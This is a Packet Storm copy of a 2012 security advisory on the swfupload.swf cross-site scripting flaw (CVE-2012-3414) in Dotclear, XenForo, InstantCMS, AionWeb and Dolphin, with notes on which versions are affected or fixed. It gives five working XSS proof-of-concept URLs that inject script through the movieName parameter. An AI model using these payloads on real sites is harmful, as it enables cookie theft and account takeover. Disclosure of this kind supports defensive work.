exploit the possibilities

SWF Upload Cross Site Scripting

SWF Upload Cross Site Scripting
Posted Nov 13, 2012
Authored by MustLive

Dotclear, InstantCMS, AionWeb, and Dolphin all include a version of swfupload.swf that suffers from a cross site scripting vulnerability.

tags | exploit, xss
advisories | CVE-2012-3414
MD5 | 507ff88c04b6509a0bf77b82a52f0725

SWF Upload Cross Site Scripting

Change Mirror Download
Hello list!

I will draw your attention to XSS vulnerability in other web applications
with swfupload. Earlier I've wrote about swfupload in WordPress
(CVE-2012-3414) and that this hole is available in many web applications.

In previous letter I've wrote the information about different versions of
this swf-file (with different names) and all versions of WordPress, which
contain any of these swf-files. And here is information about Dotclear,
XenForo, InstantCMS, AionWeb, Dolphin - among multiple web applications
which are bundled with swfupload.swf.

-------------------------
Affected products:
-------------------------

Vulnerable are potentially all versions of Dotclear, InstantCMS, AionWeb,
Dolphin. There is no information that they have fixed this vulnerability in
their software (at that this vulnerability was fixed in WordPress 3.3.2 at
20.04.2012).

Vulnerable are versions XenForo 1.0.0 - 1.1.2. In XenForo 1.1.3 this
vulnerability was fixed and patch was released for previous versions
(already at 19.06.2012).

The developers of WordPress released new version of flash file (the same did
the developers of XenForo), which could be used by all web developers, which
were using swfupload.

----------
Details:
----------

XSS (WASC-08):

Dotclear:

http://site/inc/swf/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

XenForo:

http://site/js/swfupload/Flash/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

InstantCMS:

http://site/includes/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

AionWeb:

http://site/engine/classes/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Dolphin:

http://site/plugins/swfupload/swf/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Swfupload is used in WordPress, plugins for WP and in other web
applications. There are many web applications with it, not as many as those
which are using JW Player (http://securityvulns.com/docs28176.html) and JW
Player Pro (http://securityvulns.com/docs28483.html) (vulnerabilities in
them I've disclosed earlier), but still a lot of.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    34 Files
  • 2
    Jul 2nd
    15 Files
  • 3
    Jul 3rd
    9 Files
  • 4
    Jul 4th
    8 Files
  • 5
    Jul 5th
    2 Files
  • 6
    Jul 6th
    3 Files
  • 7
    Jul 7th
    1 Files
  • 8
    Jul 8th
    15 Files
  • 9
    Jul 9th
    15 Files
  • 10
    Jul 10th
    20 Files
  • 11
    Jul 11th
    17 Files
  • 12
    Jul 12th
    15 Files
  • 13
    Jul 13th
    2 Files
  • 14
    Jul 14th
    1 Files
  • 15
    Jul 15th
    20 Files
  • 16
    Jul 16th
    27 Files
  • 17
    Jul 17th
    6 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close